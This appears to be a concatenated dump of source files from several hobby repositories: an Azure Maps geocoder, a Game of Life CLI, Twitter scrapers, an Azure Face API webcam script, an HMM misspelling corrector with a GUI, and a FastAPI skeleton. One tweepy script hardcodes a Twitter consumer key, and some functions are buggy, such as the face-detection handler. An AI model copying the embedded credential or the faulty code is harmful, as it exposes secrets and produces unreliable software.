open("geo_addresses.json", "wt", encoding="utf8") as outf:
for line in inf:
obj = json.loads(line)
address = obj['address']
cap = obj['cap']
region = obj['region']
state = obj['state']
try:
params['query'] = ", ".join([address, cap, region, state])
encoded = urllib.parse.urlencode(params)
request_url = url + encoded
response = requests.get(request_url)
results = response.json()['results']
# response['results'][0]['address']['countrySecondarySubdivision']
latitude = results[0]['position']['lat']
longitude = results[0]['position']['lon']
obj['latitude'] = latitude
obj['longitude'] = longitude
obj['type'] = "Pharmacy" if "farmaci" in obj['url'].lower() else "Textile"
str_obj = json.dumps(obj, ensure_ascii=False)
outf.write(str_obj + "\n")
except Exception as message:
print(f"Impossibile to get information because: {message}")
if __name__ == '__main__':
with open('azuremaps_config.yml', encoding="utf8") as file:
configs = yaml.load(file, Loader=yaml.FullLoader)
geolocalize(configs)
```
|
{
"source": "JeyDi/GameOfLife",
"score": 3
}
|
#### File: JeyDi/GameOfLife/config.py
```python
import os
import logging
from logging.handlers import RotatingFileHandler
# Set the logs
VERBOSITY = os.getenv(
"VERBOSITY", "debug"
) # info as default, #debug for local dev
LOG_PATH = os.getenv("LOG_PATH", "./logs")
# Define the logs
# Set verbosity
def configure_logging(verbosity=VERBOSITY, log_path=LOG_PATH):
log_level = logging.getLevelName(verbosity.upper())
if isinstance(log_level, int):
logging.basicConfig(
level=log_level,
format="[%(levelname)s] %(asctime)s | %(message)s | in function: %(funcName)s",
handlers=[
RotatingFileHandler(
os.path.join(log_path, "info.log"),
maxBytes=10000,
backupCount=10,
),
logging.StreamHandler(),
],
)
result = True
else:
result = False
raise NotImplementedError(
f"Logging level {VERBOSITY.upper()} does not exist!"
)
return result
ROWS = 40
COLUMNS = 40
MAX_PROB = 2
MAX_TICK = 60
```
#### File: JeyDi/GameOfLife/main.py
```python
import time
import typer
import logging
from config import configure_logging, ROWS, COLUMNS, MAX_PROB
from src.board import GameBoard
from src.rules import game_status
def main(
user: int = typer.Option(1, min=0, max=1),
rows: int = typer.Option(40, min=10),
columns: int = typer.Option(40, min=10),
max_prob: int = typer.Option(2, min=2, max=9),
max_tick: int = typer.Option(60, min=-1),
sleep: int = typer.Option(1, min=1),
verbosity: str = typer.Option("info"),
):
# Configure the logging
configure_logging(verbosity, "./logs")
# Use typer
if user == "1":
# Ask for the user value input
rows = int(typer.prompt("Insert the number of rows"))
columns = int(typer.prompt("Insert the number of columns"))
max_prob = int(
typer.prompt(
"Insert the probability of spawning a new living cell"
)
)
max_tick = int(
typer.prompt(
"Insert the number of iterations you want to observe (-1 for endless)"
)
)
launch = typer.confirm("Do you want to launch the simulation?")
if not launch:
message = typer.style("Ok! Bye...", fg=typer.colors.RED, bold=True)
typer.echo(message)
raise typer.Abort()
message = typer.style("Launching...", fg=typer.colors.GREEN, bold=True)
typer.echo(message)
# Define the simulation default parameters
if rows == 0:
rows = ROWS
if columns == 0:
columns = COLUMNS
if max_prob == 0:
max_prob = MAX_PROB
tick = 0
logging.info("Launching the game")
logging.debug(f"Rows: {rows}")
logging.debug(f"Columns: {columns}")
logging.debug(f"Max_prob: {max_prob}")
logging.debug(f"Max Ticks: {max_tick}")
logging.debug(f"Verbosity: {verbosity}")
logging.debug(f"Max Ticks: {sleep}")
logging.debug(f"Alive probability: {1/(max_prob+1)}")
# create a board:
game_board = GameBoard(rows, columns, max_prob)
# run the first iteration of the board:
game_board.print_board(tick)
# Update the game status for every tick
while tick <= max_tick:
logging.debug(f"Tick: {tick}")
game_status(game_board, tick)
time.sleep(sleep)
tick += 1
game_board.print_board(tick)
if __name__ == "__main__":
typer.run(main)
```
#### File: GameOfLife/src/board.py
```python
import logging
from random import randint
from src.status import Cell
class GameBoard:
def __init__(self, rows: int, columns: int, max_prob=2):
self._rows = rows
self._columns = columns
# Define the grid
self._grid = [
[Cell() for c in range(self._columns)] for r in range(self._rows)
]
logging.debug(
f"Board generated with: {rows} rows, and {columns} columns"
)
# Build the board
self._build_board(max_prob)
logging.info("Initial board generated")
def _build_board(self, max_prob: int):
logging.debug("Building the board")
for r in self._grid:
for c in r:
# set the probability to spawn a living cell
probability = randint(0, max_prob)
if probability == 1:
c.set_alive()
def print_board(self, tick: int):
logging.info("\n\n\n\n")
logging.info(f"Board status tick: {tick}")
for r in self._grid:
for c in r:
print(f"{c.print_status()}", end="")
print()
```
|
{
"source": "JeyDi/IRPersonalNews",
"score": 3
}
|
#### File: PythonApps/Tweets/main.py
```python
from utilities.settings import downloadWithUsername, downloadWithQuerySearch, mergeFiles
# Documentation
# https://github.com/Jefferson-Henrique/GetOldTweets-python
def main():
print("-- Custom Tweet Downloader --")
# Keywords are: Politics, Science, Sport, Lifestyle, Tech
# keywords = ["politics","science","sport","lifesyle","tech"]
#
# for k in keywords:
# print(f"Downloading tweets for keyword: {k}")
# Politics
downloadWithQuerySearch("politics", username="BBCPolitics", collection_name="politics_1", max_tweets=3000)
downloadWithQuerySearch("politics", username="CNNPolitics", collection_name='politics_2', max_tweets=3000)
# Tech
downloadWithQuerySearch("tech", username="verge", collection_name='tech_1', max_tweets=3000)
downloadWithQuerySearch("tech", username="WiredUk", collection_name='tech_2', max_tweets=3000)
# Sport
downloadWithQuerySearch("sport", username="BBCSport", collection_name='sport_1', max_tweets=3000)
downloadWithQuerySearch("sport", username="Eurosport", collection_name='sport_2', max_tweets=3000)
# Lifestyle
downloadWithQuerySearch("lifestyle", username="voguemagazine", collection_name='lifestyle_1', max_tweets=3000)
downloadWithQuerySearch("lifestyle", username="IndyLife", collection_name='lifestyle_2', max_tweets=3000)
# Science
downloadWithQuerySearch("science", username="sciam", collection_name='science_1', max_tweets=3000)
downloadWithQuerySearch("science", username="sciencemagazine", collection_name='science_2', max_tweets=3000)
# Merge the result into a single file
result = mergeFiles()
return True
if __name__ == '__main__':
#result = main()
# Merge the result into a single file
result = mergeFiles()
print(result)
```
#### File: Tweets/utilities/settings.py
```python
import GetOldTweets3 as got
import pandas as pd
import os
import glob
from tqdm import tqdm
def mergeFiles(extension="csv", path=None):
"""
Merge files from a specific folder in a specific format
:param extension: format of the file (for example: csv)
:param path: custom path where you want to save the csv
:return:
"""
base_path = os.path.abspath('')
if path is not None:
os.chdir(path)
else:
from_files = os.path.join(base_path, "TweetsDownloaded")
try:
file_name = os.path.join(base_path, "combined_file" + '.' + extension)
os.chdir(from_files)
all_filenames = [i for i in glob.glob('*.{}'.format(extension))]
# combine all files in the list
combined_csv = pd.concat([pd.read_csv(f, sep=";") for f in all_filenames])
# Parse the file and remove special chars (avoid errors into lucene indexes)
colnames = combined_csv.columns
combined_csv[colnames] = combined_csv[colnames].replace({';': ''}, regex=True)
# export to csv
combined_csv.to_csv(file_name, index=False, sep=";", encoding='utf-8-sig')
print(f"Files combined into: {file_name}")
return True
except Exception as message:
print(f"Impossible to concat the file into: {from_files} because: {message}")
return False
def writeTweetDisk(tweet_collection, collection_name, folder=None, path=None):
"""
Write a tweet to disk
:param tweet_collection: object containing tweets
:param collection_name: name of the collection
:param folder: folder you want to save the tweets
:param path: optional pat if you want to export tweets outside the main folder
:return: boolean (True, False)
"""
# Create the tweets collection
tweets = pd.DataFrame()
permalink_list = []
username_list = []
text_list = []
date_list = []
retweets_list = []
favorite_list = []
mentions_list = []
hashtag_list = []
geo_list = []
# Obtain data from the tweet_collection object
tweet_len = tweet_collection.__len__()
for t in tqdm(range(tweet_len)):
permalink_list.append(tweet_collection[t].permalink)
username_list.append(tweet_collection[t].username)
text_list.append(tweet_collection[t].text)
date_list.append(tweet_collection[t].date)
retweets_list.append(tweet_collection[t].retweets)
favorite_list.append(tweet_collection[t].favorites)
mentions_list.append(tweet_collection[t].mentions)
hashtag_list.append(tweet_collection[t].hashtags)
geo_list.append(tweet_collection[t].geo)
# Populate the dictionary for the export
tweets["permalink"] = permalink_list
tweets["username"] = username_list
tweets["text"] = text_list
tweets["date"] = date_list
tweets["retweet"] = retweets_list
tweets["favorite"] = favorite_list
tweets["mentions"] = mentions_list
tweets["hashtag"] = hashtag_list
tweets["geo"] = geo_list
tweets.index.name = "id"
# Parse the file and remove special chars
colnames = tweets.columns
tweets[colnames] = tweets[colnames].replace({';': ''}, regex=True)
# Write to disk
# Set the path for the file
base_path = os.path.abspath('')
if path is not None:
file_path = path
else:
file_path = base_path
file_name = collection_name + '.csv'
if folder is not None:
export_path = os.path.join(file_path, folder, file_name)
else:
export_path = os.path.join(file_path, file_name)
try:
tweets.to_csv(export_path, sep=";")
print(f"Collection of tweet: {collection_name} exported successfully to: {export_path}")
return True
except Exception as message:
print(f"Impossible to generate the csv to {export_path} because: {message}")
return False
def printTweet(description, tweets):
"""
Print the tweet you have downloaded
:param description: custom user description of the tweet
:param tweets: collection of tweets you want to view
:return: nothing
"""
print(description)
tweet_len = tweets.__len__()
for t in range(tweet_len):
print("Username: %s" % tweets[t].username)
print("Retweets: %d" % tweets[t].retweets)
print("Text: %s" % tweets[t].text)
print("Mentions: %s" % tweets[t].mentions)
print("Hashtags: %s\n" % tweets[t].hashtags)
def downloadWithUsername(username, since=None, until=None, collection_name=None, max_tweets=1000, print=False):
"""
# Mode 1 - Get tweets by username
:param collection_name: name of the tweet collection
:param until: initial date for the research
:param since: final date for the research
:param username: username for the research
:param max_tweets: maximal number of tweets
:return:
"""
if since is None or until is None:
tweetCriteria = got.manager.TweetCriteria().setUsername(username).setMaxTweets(max_tweets)
tweet = got.manager.TweetManager.getTweets(tweetCriteria)
# Research since and until a date
else:
tweetCriteria = got.manager.TweetCriteria().setUsername(username).setSince(since).setUntil(
until).setMaxTweets(max_tweets)
tweet = got.manager.TweetManager.getTweets(tweetCriteria)
if print:
# Print results
printTweet(f"Tweet from {username}", tweet)
# Write the tweet to disk
if collection_name is None:
writeTweetDisk(tweet, username, "TweetsDownloaded")
else:
writeTweetDisk(tweet, collection_name, "TweetsDownloaded")
return True
def downloadWithQuerySearch(query, username=None, since='2015-01-01', until='2020-02-02', collection_name=None,
max_tweets=1000, print=False):
"""
Download tweets based on a specific query and optionally a date
:param query: the query you want to use for the research
:param since: start date for the research
:param until: end date for the research
:param collection_name: name of the collection you want to export
:param max_tweets: max number of tweets you want to download
:return:
"""
# Example 2 - Get tweets by query search
if username is None:
tweetCriteria = got.manager.TweetCriteria().setQuerySearch(query).setSince(since).setUntil(
until).setMaxTweets(max_tweets)
else:
tweetCriteria = got.manager.TweetCriteria().setQuerySearch(query).setUsername(username).setSince(
since).setUntil(
until).setMaxTweets(max_tweets)
tweet = got.manager.TweetManager.getTweets(tweetCriteria)
if print:
# Print results
printTweet(f"Tweet with query: {query} since: {since}, until: {until}", tweet)
# Write the tweet to disk
if collection_name is None:
writeTweetDisk(tweet, query, "TweetsDownloaded")
else:
writeTweetDisk(tweet, collection_name, "TweetsDownloaded")
return True
```
|
{
"source": "JeyDi/MicrosoftFaceRecognition",
"score": 3
}
|
#### File: App/functions/camera.py
```python
import numpy as np
import cv2
from functions.faceapi import detect
def cameraCapture(auth_client, video_capture=0):
"""
Camera Stream with Open CV 2 on Laptop
"""
cap = cv2.VideoCapture(video_capture)
#set the width and height, and UNSUCCESSFULLY set the exposure time
cap.set(3,1080)
cap.set(4,1024)
cap.set(15, 0.1)
while (cap.isOpened()):
video_frame_captured, video_frame = cap.read()
gray_video_frame = cv2.cvtColor(video_frame, cv2.COLOR_BGR2GRAY)
gray_video_frame = cv2.equalizeHist(gray_video_frame)
#Detect the input
if(video_frame_captured is True):
d = detect(auth_client, video_frame)
print(d)
#Show the box
cv2.imshow("input",video_frame)
key = cv2.waitKey(10)
if key == 27:
break
cv2.destroyAllWindows()
cv2.VideoCapture(0).release()
```
#### File: App/functions/faceapi.py
```python
import asyncio, io, glob, os, sys, time, uuid, requests
from urllib.parse import urlparse
from io import BytesIO
import sys
import datetime
import cv2
from PIL import Image, ImageDraw
from azure.cognitiveservices.vision.face import FaceClient
from msrest.authentication import CognitiveServicesCredentials
from azure.cognitiveservices.vision.face.models import TrainingStatusType, Person, SnapshotObjectType, OperationStatusType, APIErrorException
def auth_client(key=None,endpoint=None):
"""Authenticate the client"""
if(key is None):
print("Cognitive Service Key not found, modify the config.yml file")
sys.exit("Impossibile to use the program without correct configuration")
if(endpoint is None):
print("Cognitive Service Endpoint not found, modify the config.yml file")
sys.exit("Impossibile to use the program without correct configuration")
# Create an authenticated FaceClient
try:
face_client = FaceClient(endpoint, CognitiveServicesCredentials(key))
except:
print("Impossible to auth to the service..please fix or retry..")
return face_client
def detect(face_client,video_frame_buffer):
"""Detect info by an image from the camera"""
#img = cv2.imencode('.jpg', image)[1].tostring()
video_frame_stream = BytesIO(video_frame_buffer.tobytes())
try:
detected = face_client.face.detect_with_stream(video_frame_stream)
image_recognized = detected.json()
image_caption = image_recognized["description"]["captions"][0]["text"].capitalize()
time_now = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
result = time_now + ": " + image_caption
except APIErrorException as api_error:
print(api_error.message)
result = "Error"
return result
```
|
{
"source": "JeyDi/Mispelling",
"score": 3
}
|
#### File: code/tweets_download/tweets_cleaner.py
```python
import csv
import re
import os
import sys
import string
import nltk
from nltk.tokenize import word_tokenize
from configparser import ConfigParser
#Some usefull regexp
MENTIONS = re.compile(r'@[^\s]*')
URL = re.compile(r'htt[^\s]*')
SYMBOLS = re.compile(r'[^A-Za-z ]')
RT = re.compile(r'RT ')
SPACE = re.compile(r'\s+')
pathname = os.path.dirname(sys.argv[0])
config = ConfigParser()
config.read( pathname + '/../config.ini')
#result folder with the downloaded tweets
input_folder = config['twitter']['twitter_raw_tweets_folder']
output_folder = config['twitter']['twitter_cleaned_tweets_folder']
#Load the file and launch the preprocessing
def loadFile(inputfile):
text = ""
try:
file = open(inputfile, 'rt',encoding='UTF-8')
text = file.read()
file.close()
except FileNotFoundError:
print("File not found, please insert a valid one")
return(text)
#TODO: need to implement a csv and a txt outfile
def writeFile(outfile,text,file_type):
print("Final file generated")
#Output the file to csv
if(file_type == "csv"):
outfile = outfile + ".csv"
with open(outfile, "wt", encoding="utf8", newline="") as out_file:
writer = csv.writer(out_file, delimiter="\t")
for tweet_id in text:
writer.writerow([tweet_id, text[tweet_id]])
#Output the file to txt
elif(file_type == "txt"):
outfile = outfile + ".txt"
with open(outfile, 'a', encoding='utf8') as text_file:
text_file.write(text + "\n")
#error if the extension is not valid
else:
print("No file extension valid")
print("File successfully writed")
#Standard preprocessing with regexp
def cleanTweets(text):
#Text preprocessing using the REGEXP
text = MENTIONS.sub(' ', text) # Mentions
text = URL.sub(' ', text) # URLs
text = SYMBOLS.sub(' ', text) # Symbols
text = RT.sub(' ', text) # RT
text = SPACE.sub(' ', text)
final_text = text.strip() # spaces at head or tail
return(final_text)
#Another way to do the preprocessing using nltk and some others library
def cleanTweetsNLTK(text):
#Tokenize the words
tokens = word_tokenize(text)
# convert to lower case
tokens = [w.lower() for w in tokens]
# remove punctuation from each word
table = str.maketrans('', '', string.punctuation)
stripped = [w.translate(table) for w in tokens]
# remove remaining tokens that are not alphabetic
words = [word for word in stripped if word.isalpha()]
return(words)
def preprocessing(profile):
print("Start preprocessing")
input_file = os.path.join(input_folder, "raw_%s.txt" % profile)
text = loadFile(input_file)
#call the text preprocessing
result_text = cleanTweets(text)
#write the outfile
outfile = os.path.join(output_folder, "clean_%s" % profile)
file_type = "txt"
writeFile(outfile,result_text,file_type)
print("Finish preprocessing tweets")
```
#### File: Mispelling/temp/hmm_hand.py
```python
import numpy as np
from math import log
from collections import Counter
class HMMModel(object):
def viterbi(self, sequence, states, initial_frequencies, state_matrix, emission_matrix):
'''
Handly Viterbi Algorithm:
Task: generare la sequenza di stati più probabile.
Input: Parametri del modello ridotto e sequenza di osservazioni
'''
k = len(states)
t = len(sequence)
T1 = np.zeros((k,t))
T1[:,0] = initial_frequencies*emission_matrix[:,0]
T2 = np.zeros((k,t))
for i in range(1,t):
for j in range(k):
temp = [T1[x,i-1]*state_matrix[x,j] for x in range(k)]
T1[j,i] = emission_matrix[j,i]*max(temp)
T2[j,i] = temp.index(max(temp))
Z = np.zeros(t)
X = [""]*t
Z[t-1] = list(T1[:,t-1]).index(max(T1[:,t-1]))
X[t-1] = states[int(Z[t-1])]
for i in range(t-1,0,-1):
Z[i-1] = T2[int(Z[i]),i]
X[i-1] = states[int(Z[i-1])]
return (X, T1, T2)
```
#### File: Mispelling/temp/mockup.py
```python
import os
import sys
import model_run_gui
from PyQt5 import QtCore, QtGui, QtWidgets
#from QtWidgets import QFileDialog
from PyQt5 import uic
#from PyQt5.QtWidgets import QApplication
# Path to this file
abspath = os.path.abspath(__file__)
dname = os.path.dirname(abspath)
os.chdir(dname)
import sys
class SecondWindow(QtWidgets.QDialog):
def __init__(self):
QtWidgets.QWidget.__init__(self)
uic.loadUi("DictSelection.ui", self)
self.checkBox_MercedesAMG.setChecked(MyWindow.use_MercedesAMG)
self.checkBox_rogerfederer.setChecked(MyWindow.use_rogerfederer)
self.checkBox_realDonaldTrump.setChecked(MyWindow.use_realDonaldTrump)
self.checkBox_Forbes.setChecked(MyWindow.use_Forbes)
self.show()
def setMercedesAMG(self):
MyWindow.use_MercedesAMG = self.checkBox_MercedesAMG.isChecked()
print("setMercedesAMG = {}".format(MyWindow.use_MercedesAMG))
pass
def setrogerfederer(self):
MyWindow.use_rogerfederer = self.checkBox_rogerfederer.isChecked()
print("setsetrogerfederer = {}".format(MyWindow.use_rogerfederer))
pass
def setrealDonaldTrump(self):
MyWindow.use_realDonaldTrump = self.checkBox_realDonaldTrump.isChecked()
print("setrealDonaldTrump = {}".format(MyWindow.use_realDonaldTrump))
pass
def setForbes(self):
MyWindow.use_Forbes = self.checkBox_Forbes.isChecked()
print("setForbes = {}".format(MyWindow.use_Forbes))
pass
class MyWindow(QtWidgets.QMainWindow):
liveCorrection = False
use_MercedesAMG = True
use_rogerfederer = True
use_realDonaldTrump = True
use_Forbes = True
@staticmethod
def getDictList():
input_dicts = []
# Choose the dicts to append as input
if MyWindow.use_MercedesAMG:
input_dicts.append('clean_MercedesAMG')
print('clean_MercedesAMG')
if MyWindow.use_rogerfederer:
input_dicts.append('clean_rogerfederer')
print('clean_rogerfederer')
if MyWindow.use_realDonaldTrump:
input_dicts.append('clean_realDonaldTrump')
print('clean_realDonaldTrump')
if MyWindow.use_Forbes:
input_dicts.append('clean_Forbes')
print('clean_Forbes')
print(input_dicts)
return input_dicts
def __init__(self):
QtWidgets.QWidget.__init__(self)
uic.loadUi("gui.ui", self)
self.show()
def input_word(self):
if self.liveCorrection:
stringIn = self.input.toPlainText()
if stringIn:
if not model_run_gui.existsModel(self.getDictList()):
self.label_ModelGeneration.setText("Generating Model ...")
QtWidgets.QMessageBox.about(self, "Info", "Model doesn't exists in memory, additional computation time is required")
self.label_ModelGeneration.setText("Model generated successfully!")
result = model_run_gui.tryViterbi(stringIn,self.getDictList())
self.output.setText(result)
else:
self.output.setText("")
pass
def push_correction(self):
if not self.liveCorrection:
print(self.input.toPlainText())
stringIn = self.input.toPlainText()
if stringIn:
if not model_run_gui.existsModel(self.getDictList()):
self.label_ModelGeneration.setText("Generating Model ...")
QtWidgets.QMessageBox.about(self, "Info", "Model doesn't exists in memory, additional computation time is required")
self.label_ModelGeneration.setText("Model generated successfully!")
result = model_run_gui.tryViterbi(stringIn,self.getDictList())
self.output.setText(result)
else:
self.output.setText("")
pass
def predicted_word(self):
pass
def setLiveCorrection(self):
print(self.checkBoxLiveCorrection.isChecked())
self.liveCorrection = self.checkBoxLiveCorrection.isChecked()
pass
def getFile(self):
options = QtWidgets.QFileDialog.Options()
options |= QtWidgets.QFileDialog.DontUseNativeDialog
# fileName, _ = QtWidgets.QFileDialog.getOpenFileName(self,"QtWidgets.QFileDialog.getOpenFileName()", "","All Files (*);;Python Files (*.py)", options=options)
fileName, _ = QtWidgets.QFileDialog.getOpenFileName(self,"QtWidgets.QFileDialog.getOpenFileName()", "","Text files (*.txt)", options=options)
if fileName:
print(fileName)
f = open(fileName, 'r', encoding='UTF-8')
with f:
data = f.read()
self.input.setText(data)
def openDialog(self):
print("proova")
self.ui = SecondWindow()
# self.window.show()
if __name__ == '__main__':
app = QtWidgets.QApplication(sys.argv)
window = MyWindow()
window.show()
sys.exit(app.exec_())
```
#### File: temp/oldFiles/provaCursorsTweet.py
```python
import tweepy
import re
import string
# Consumer keys and access tokens, used for OAuth
consumer_key = "P5wTozEUuNOAJCXMajGnRcDs2"
consumer_secret = "<KEY>"
access_token = "<KEY>"
access_token_secret = "<KEY>"
# OAuth process, using the keys and tokens
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
# Creation of the actual interface, using authentication
api = tweepy.API(auth)
#per riazzerare ogni volta il file
text_file = open(".\\tweetTrumpComplete.txt","w")
text_file.close
text_file = open(".\\tweetTrumpClean.txt","w")
text_file.close
text_file = open(".\\tweetFedererComplete.txt","w")
text_file.close
text_file = open(".\\tweetFedererClean.txt","w")
text_file.close
text_file = open(".\\tweetMercedesComplete.txt","w")
text_file.close
text_file = open(".\\tweetMercedesClean.txt","w")
text_file.close
# for tweet in public_tweets:
# with open("tweet.txt", 'a', encoding='utf8') as text_file:
# text_file.write(tweet.text + "\n")
# print(tweet.text)
string_punctuation = ".#,_;"
def remove_punctuation(s):
no_punct = ""
for letter in s:
if letter not in string_punctuation:
no_punct += letter
return no_punct
def get_user_mentions(tweet):
return [m['screen_name'] for m in tweet['entities']['user_mentions']]
#se si mette un numero dentro ad items si limita il download a quel numero di tweet indicato
for status in tweepy.Cursor(api.user_timeline, screen_name='@realDonaldTrump').items():
with open("tweetTrumpComplete.txt", 'a', encoding='utf8') as text_file:
text_file.write(status.text + "\n")
strNoUrl = re.sub(r"http\S+", "", status.text)
strNoPunct = remove_punctuation(strNoUrl)
with open("tweetTrumpClean.txt", 'a', encoding='utf8') as text_file:
text_file.write(strNoPunct + "\n")
# print(status._json['text'])
#print(status.text)
for status in tweepy.Cursor(api.user_timeline, screen_name='@rogerfederer').items():
with open("tweetFedererComplete.txt", 'a', encoding='utf8') as text_file:
text_file.write(status.text + "\n")
strNoUrl = re.sub(r"http\S+", "", status.text)
strNoPunct = remove_punctuation(strNoUrl)
with open("tweetFedererClean.txt", 'a', encoding='utf8') as text_file:
text_file.write(strNoPunct + "\n")
for status in tweepy.Cursor(api.user_timeline, screen_name='@MercedesAMG').items(2000):
with open("tweetMercedesComplete.txt", 'a', encoding='utf8') as text_file:
text_file.write(status.text + "\n")
strNoUrl = re.sub(r"http\S+", "", status.text)
strNoPunct = remove_punctuation(strNoUrl)
with open("tweetMercedesClean.txt", 'a', encoding='utf8') as text_file:
text_file.write(strNoPunct + "\n")
```
#### File: temp/oldFiles/utility.py
```python
import csv
import numpy as np
import pandas as pd
import math as mh
import logging
import re
import os
from nltk.util import ngrams
from collections import Counter
# Build a merged dictionary from input file and returns the path to it
def compute_dictionary(input_dicts):
path_to_dictionaries = "../tweet_library/"
path_to_final_dictionary = "../dictionaries/"
# mkdir to dictionary if not exists
if(not(os.path.exists(path_to_final_dictionary))):
os.makedirs(path_to_final_dictionary)
# build path to merged dictionary
for dict in input_dicts:
path_to_final_dictionary += dict
path_to_final_dictionary += ".txt"
# remove if already existing
try:
os.remove(path_to_final_dictionary)
except OSError:
pass
# concatenate input_dicts in the final dictionary
with open(path_to_final_dictionary, "a", encoding="utf8") as output_dict:
for dict in input_dicts:
dict_path = path_to_dictionaries + dict + ".txt"
with open(dict_path, "rt", encoding="utf-8") as input_dict:
if(not(os.path.exists(dict_path))):
print("Dizionario non presente!")
output_dict.write(input_dict.read())
return path_to_final_dictionary
##########-----TEMP-----#########
#My Method to generate frequency matrix using a given alphabet and a file
def createFrequencyMatrix(file):
alphabet = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z']
finalList = []
with open(file, "rt", encoding="utf8") as myFile:
for char in alphabet:
text = myFile.read()
text = text.lower()
curstring = text
letters = []
while len(curstring) > 0:
arr = curstring.split(char, 1)
if len(arr) == 1:
break
letters.append(arr[1][0])
curstring = arr[1]
#Remove the space
while ' ' in letters:
letters.remove(' ')
freq = {}
for l in letters:
if l in freq.keys():
continue
freq[l] = letters.count(l) / len(letters)
finalList.append(freq)
#Create the final dataframe with the letters
myDict = pd.DataFrame(finalList)
print(myDict)
return myDict
```
|
{
"source": "JeyDi/Python-Skeleton",
"score": 2
}
|
#### File: app/src/config.py
```python
import os
from functools import lru_cache
from dotenv import dotenv_values
from pathlib import Path
from pydantic import BaseSettings, root_validator
from typing import Any, Dict
from app.src.common.utils import read_yaml
from app.src.logger import logger
class Settings(BaseSettings):
"""
Settings class for application settings and secrets management
Official documentation on pydantic settings management:
- https://pydantic-docs.helpmanual.io/usage/settings/
"""
# Set the application variables
APP_NAME: str = os.environ.get("APP_NAME", "Test")
# if you want to test gunicorn the below environment variabile must be False
DEBUG_MODE: str = os.environ.get("DEBUG_MODE", "True")
VERBOSITY: str = os.environ.get("VERBOSITY", "DEBUG")
# Application Path
APP_PATH: str = os.environ.get("PROJECT_WORKSPACE", os.path.abspath("."))
CONFIG_PATH: str = os.path.join(APP_PATH, "app", "config")
DATA_PATH: str = os.path.join(APP_PATH, "app", "data")
# Database settings
DB_CONFIG: dict = {
"db_name": os.getenv("DB_NAME", "test"),
"db_user": os.getenv("DB_USER", "root"),
"db_password": os.getenv("DB_PASSWORD", "<PASSWORD>"),
"db_port": os.getenv("DB_PORT", "5492"),
"db_host": os.getenv("DB_HOST", "localhost"),
}
# Read the configurations
APP_CONFIG: dict = read_yaml(CONFIG_PATH, filename="settings.yml")
# logging
logger.debug(f"App path: {APP_PATH}")
logger.debug(f"Config path: {CONFIG_PATH}")
logger.debug(f"Data Path: {DATA_PATH}")
# EXTRA VALUES not mapped in the config but that can be existing in .env or env variables in the system
extra: Dict[str, Any] = None
@root_validator(pre=True)
def build_extra(cls, values: Dict[str, Any]) -> Dict[str, Any]:
all_required_field_names = {
field.alias for field in cls.__fields__.values() if field.alias != "extra"
} # to support alias
extra: Dict[str, Any] = {}
for field_name in list(values):
if field_name not in all_required_field_names:
extra[field_name] = values.pop(field_name)
values["extra"] = extra
return values
def env_load(env_file: str) -> Settings:
"""
If you want to generate settings with a specific .env file.
Be carefull: you have to insert only the env that are in the config.
Look into official technical documentation for more information about the variables.
Args:
env_file (str): The path to the .env file. (with the name)
Returns:
Settings: The settings object with the .env file loaded.
"""
try:
# get the dotenv file values into an OrderedDict
env_settings = dotenv_values(env_file)
# convert to normal dict
env_settings = dict(env_settings)
# define and create the new object
settings = Settings(**env_settings)
return settings
except Exception as message:
print(f"Error: impossible to read the env: {message}")
return None
# cache system to read the settings without everytime read the .env file
@lru_cache()
def get_settings(settings: Settings = None, env_file: str = None, **kwargs) -> Settings:
"""
Function to get the settings object inside the config.
This function use lru_cache to cache the settings object and avoid to read everytime the .env file from disk (much more faster)
Args:
settings (Settings, optional): The settings object to use. Defaults to None.
Returns:
Settings: The settings object.
"""
# define the new settings
try:
if not settings:
if env_file:
# check if env file existing
if not Path(env_file).exists(): # nocov
settings = None
raise ValueError(f"Config file {env_file} does not exist.")
else:
settings = env_load(env_file)
else:
settings = Settings(**kwargs)
return settings
except Exception as message:
print(f"Error: impossible to get the settings: {message}")
return None
# # define the settings (use the env file if it's used)
env_file = os.environ.get("ENV_FILE", None)
settings = get_settings(env_file=env_file)
```
#### File: src/core/manager.py
```python
from typing import List
from app.src.logger import logger
from app.src.config import settings
def logic_test(message: str = None) -> str:
"""Logic test function.
This is a simple example how to write functions in Python
Args:
message (str, optional): A message you want to use. Defaults to None.
Raises:
Exception: If it's impossible to compose the message
Returns:
str: The elaborated message by the function
"""
logger.debug("Test logic function")
try:
message = message.upper()
except Exception as e:
logger.error(f"Impossible to compose the message: {message}, because: {e}")
logger.exception(f"Error: {e}")
raise Exception(e)
logger.debug(f"Message modified: {message} on the app: {settings.APP_NAME}")
return message
def convert_numbers(numbers: List[int]) -> int:
"""Convert and sum all elements in a list
Args:
numbers (List[int]): List of integers to sum
Returns:
int: the result of the sum
"""
result = sum(numbers)
return result
def name_parsing(name: str = None) -> str:
"""Ester egg spaghetti
Args:
name (str, optional): the name you want to pass. Defaults to None.
Returns:
str: the result string
"""
if name is None:
logger.error(f"Name: {name} not valid, please retry..")
logger.exception("Name not valid..")
logger.info(f"Hello: {name.strip().lower()}, welcome here!")
logger.debug("So do you like spaghetti right?")
return name
```
#### File: src/{{cookiecutter.package_name}}/pipeline.py
```python
def run_pipeline(local_data_path: str):
"""
Run the main processing pipeline.
Returns:
A dataframe containing the output of the pipeline
"""
# io = IO(path)
# df = io.load_cleaned_file(download_always=False)
# df = add_choke_events(df)
# Add calls to features.Xxx here
# save (or return) dataframe here?
```
#### File: api/endpoints/user.py
```python
import datetime as dt
from typing import Any, List
from fastapi import APIRouter, Depends, HTTPException
# from fastapi.encoders import jsonable_encoder
from sqlalchemy.orm import Session
from app.src.db.manager import get_session
from app.src import models
from app.src.api import crud
from app.src.common import security, utils
router = APIRouter()
# define and inherit the base model for the CRUD operations over products
crud_base = crud.base(models.User)
# create user
# get all users
# get single user
# update user
# delete user
# make user admin
@router.get("/", response_model=List[models.UserDataModel])
async def read_users(
*,
db: Session = Depends(get_session),
skip: int = 0,
limit: int = 100,
current_user: models.UserBase = Depends(security.get_current_admin_user),
) -> Any:
"""
Retrieve all users
"""
start_time = dt.datetime.now()
try:
users = crud.user.get_multi(db, skip=skip, limit=limit)
utils.profiling_api("user:get:all", start_time, "info")
if not users:
raise HTTPException(status_code=404, detail="No users found")
except Exception as e:
utils.profiling_api("user:get:all", start_time, "error")
raise HTTPException(
status_code=404, detail=f"Impossible to get the list of all users: {e}"
)
return users
@router.get("/{user_id}", response_model=models.UserDataModel)
